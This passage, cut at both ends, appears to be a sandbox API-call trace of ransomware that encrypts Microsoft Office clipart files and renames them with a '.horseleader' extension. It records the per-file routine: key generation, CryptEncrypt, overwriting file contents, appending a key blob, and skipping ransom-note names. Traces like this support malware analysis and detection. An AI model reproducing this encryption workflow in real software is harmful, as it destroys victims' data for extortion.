Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 67 [0252.489] StrStrIW (lpFirst="AG00158_.GIF", lpSrch=".horseleader") returned 0x0 [0252.489] lstrcmpW (lpString1="AG00158_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.490] lstrcmpW (lpString1="AG00158_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.490] lstrlenW (lpString=".testttjffg") returned 11 [0252.490] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.490] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.490] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.491] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 67 [0252.491] StrStrW (lpFirst="AG00158_.GIF", lpSrch=".txt") returned 0x0 [0252.491] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5030) returned 1 [0252.491] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x13a6, lpOverlapped=0x0) returned 1 [0252.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.494] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x13a6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x13a6, lpOverlapped=0x0) returned 1 [0252.494] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.494] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.494] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.495] CloseHandle (hObject=0x158) returned 1 [0252.495] GetProcessHeap () returned 0x780000 [0252.495] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.495] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.horseleader") returned 79 [0252.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.horseleader")) returned 1 [0252.496] GetProcessHeap () returned 0x780000 [0252.496] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.496] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a69f700, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9a69f700, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x47a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00160_.GIF", cAlternateFileName="")) returned 1 [0252.496] lstrcmpiW (lpString1="AG00160_.GIF", lpString2="Windows") returned -1 [0252.496] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 67 [0252.496] StrStrIW (lpFirst="AG00160_.GIF", lpSrch=".horseleader") returned 0x0 [0252.496] lstrcmpW (lpString1="AG00160_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.497] lstrcmpW (lpString1="AG00160_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.497] lstrlenW (lpString=".testttjffg") returned 11 [0252.497] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.497] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.497] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.497] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 67 [0252.498] StrStrW (lpFirst="AG00160_.GIF", lpSrch=".txt") returned 0x0 [0252.498] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1146) returned 1 [0252.498] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x47a, lpOverlapped=0x0) returned 1 [0252.500] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb86, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.500] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x47a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x47a, lpOverlapped=0x0) returned 1 [0252.500] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.500] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.500] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.500] CloseHandle (hObject=0x158) returned 1 [0252.500] GetProcessHeap () returned 0x780000 [0252.500] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.501] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.horseleader") returned 79 [0252.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.horseleader")) returned 1 [0252.501] GetProcessHeap () returned 0x780000 [0252.501] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.501] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a54300, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95a54300, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x1d9f, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00161_.GIF", cAlternateFileName="")) returned 1 [0252.501] lstrcmpiW (lpString1="AG00161_.GIF", lpString2="Windows") returned -1 [0252.501] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 67 [0252.502] StrStrIW (lpFirst="AG00161_.GIF", lpSrch=".horseleader") returned 0x0 [0252.502] lstrcmpW (lpString1="AG00161_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.502] lstrcmpW (lpString1="AG00161_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.502] lstrlenW (lpString=".testttjffg") returned 11 [0252.502] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 67 [0252.502] StrStrW (lpFirst="AG00161_.GIF", lpSrch=".txt") returned 0x0 [0252.502] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7583) returned 1 [0252.503] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1d9f, lpOverlapped=0x0) returned 1 [0252.505] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe261, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.505] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1d9f, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1d9f, lpOverlapped=0x0) returned 1 [0252.505] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.505] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.505] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.505] CloseHandle (hObject=0x158) returned 1 [0252.505] GetProcessHeap () returned 0x780000 [0252.505] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.505] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.horseleader") returned 79 [0252.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.horseleader")) returned 1 [0252.506] GetProcessHeap () returned 0x780000 [0252.506] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.506] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65e47e00, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65e47e00, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0x1b48, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00163_.GIF", cAlternateFileName="")) returned 1 [0252.506] lstrcmpiW (lpString1="AG00163_.GIF", lpString2="Windows") returned -1 [0252.506] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 67 [0252.506] StrStrIW (lpFirst="AG00163_.GIF", lpSrch=".horseleader") returned 0x0 [0252.506] lstrcmpW (lpString1="AG00163_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.507] lstrcmpW (lpString1="AG00163_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.507] lstrlenW (lpString=".testttjffg") returned 11 [0252.507] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.507] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.507] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.508] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 67 [0252.508] StrStrW (lpFirst="AG00163_.GIF", lpSrch=".txt") returned 0x0 [0252.508] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6984) returned 1 [0252.508] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1b48, lpOverlapped=0x0) returned 1 [0252.510] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe4b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.510] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1b48, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1b48, lpOverlapped=0x0) returned 1 [0252.510] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.511] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.511] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.511] CloseHandle (hObject=0x158) returned 1 [0252.511] GetProcessHeap () returned 0x780000 [0252.511] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.511] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.horseleader") returned 79 [0252.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.horseleader")) returned 1 [0252.513] GetProcessHeap () returned 0x780000 [0252.513] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.513] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4d0800, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d4d0800, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x33c6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00164_.GIF", cAlternateFileName="")) returned 1 [0252.513] lstrcmpiW (lpString1="AG00164_.GIF", lpString2="Windows") returned -1 [0252.513] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 67 [0252.513] StrStrIW (lpFirst="AG00164_.GIF", lpSrch=".horseleader") returned 0x0 [0252.513] lstrcmpW (lpString1="AG00164_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.513] lstrcmpW (lpString1="AG00164_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.513] lstrlenW (lpString=".testttjffg") returned 11 [0252.513] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.513] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.513] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.513] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.514] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 67 [0252.514] StrStrW (lpFirst="AG00164_.GIF", lpSrch=".txt") returned 0x0 [0252.514] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13254) returned 1 [0252.514] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x33c6, lpOverlapped=0x0) returned 1 [0252.517] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcc3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.517] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x33c6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x33c6, lpOverlapped=0x0) returned 1 [0252.517] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.517] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.517] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.517] CloseHandle (hObject=0x158) returned 1 [0252.517] GetProcessHeap () returned 0x780000 [0252.518] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.518] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.horseleader") returned 79 [0252.518] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.horseleader")) returned 1 [0252.518] GetProcessHeap () returned 0x780000 [0252.519] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.519] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89b98100, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x89b98100, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x2186, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00165_.GIF", cAlternateFileName="")) returned 1 [0252.519] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="Windows") returned -1 [0252.519] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 67 [0252.519] StrStrIW (lpFirst="AG00165_.GIF", lpSrch=".horseleader") returned 0x0 [0252.519] lstrcmpW (lpString1="AG00165_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.519] lstrcmpW (lpString1="AG00165_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.519] lstrlenW (lpString=".testttjffg") returned 11 [0252.519] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.519] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.519] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.519] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.521] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 67 [0252.521] StrStrW (lpFirst="AG00165_.GIF", lpSrch=".txt") returned 0x0 [0252.521] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8582) returned 1 [0252.521] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2186, lpOverlapped=0x0) returned 1 [0252.523] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffde7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.523] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2186, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2186, lpOverlapped=0x0) returned 1 [0252.524] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.524] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.524] WriteFile (in: 